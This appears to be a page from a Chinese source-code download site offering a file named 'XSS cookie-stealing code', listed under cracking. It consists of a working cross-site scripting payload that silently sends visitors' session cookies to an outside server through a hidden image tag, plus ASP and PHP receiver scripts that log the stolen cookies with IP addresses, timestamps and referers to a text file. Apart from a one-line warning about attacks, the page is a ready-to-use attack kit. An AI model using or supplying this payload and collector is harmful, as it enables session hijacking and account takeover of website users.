开通博客赚积分
发布资源赚积分
分类

源码开发语言/平台
当前位置:首页 > 源码/资料 > 系统/网络安全 > 破解 > 查看源码
XSS偷cookie的代码.txt
资源名称:xssshell.rar [点击查看]
上传用户:wangting
上传日期:2020-01-24
资源大小:2226k
文件大小:1k
源码类别:

破解

开发平台:

ASP/ASPX

XSS偷cookie的代码.txt:源码内容
  1. <script>document.write('<img src="http://url/news.asp?msg='+document.cookie+'" width=0 height=0 border=0 />');</script>
  3. news.asp代码:
  4. <%
  5. msg=Request.ServerVariables("QUERY_STRING")    
  6. testfile=Server.MapPath("cook.txt")    
  7. set fs=server.CreateObject("scripting.filesystemobject")    
  8. set thisfile=fs.OpenTextFile(testfile,8,True,0)    
  9. thisfile.Writeline(""&msg& "")    
  10. thisfile.close    
  11. set fs = nothing    
  12. %>
  14. PHP版代码:
  15. <?php 
  16. $cookie = $_GET['c']; 
  17. $ip = getenv ('REMOTE_ADDR'); 
  18. $time=date("j F, Y, g:i a"); 
  19. $referer=getenv ('HTTP_REFERER'); 
  20. $fp = fopen('cook.txt', 'a'); 
  21. fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$time. '<br> Referer: '.$referer.'<br><br><br>'); 
  22. fclose($fp); 
  23. ?>
  25. 注意:最近警惕XX攻击。